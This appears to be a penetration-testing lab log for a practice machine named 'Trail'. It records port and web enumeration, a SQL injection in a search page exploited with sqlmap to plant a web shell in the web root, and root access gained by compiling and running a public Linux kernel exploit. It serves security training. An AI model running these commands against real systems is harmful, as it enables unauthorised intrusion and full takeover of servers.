Trails

🧪 Pentest Log: {{date:2025-08-31}}

🔍 Target Information

Machine Name: Trail
IP Address: 10.11.1.41
Operating System: Linux

ip=10.11.1.41

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

The search function seem to be vulnerable to SQLI

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 80
Vulnerability Type: SQLI

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

sqlmap -u "http://10.11.1.41/search-results.php" --data "search=Rabacal" --dbs --batch


sqlmap -u "http://10.11.1.41/search-results.php" --data "search=Rabacal" --batch --file-write="shell.php" --file-dest="/var/www/html/shell.php"

🧬 Privilege Escalation

👤 Current Access

User: www-data
Groups: 33(www-data)
Shell Type: web shell

🔍 Enumeration

Kernel Check:

uname -a

Found

4.4.0-81-generic #104-Ubuntu

Google for exploit

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Kernel Exploit
Target Binary/Service: N/A
Reference / Source: N/A

🔧 Exploit Steps

Setup

gcc 45010.c -o 45010 --static

Smash to root

./45010

Key File

2y1n8eogzx30wj706qa1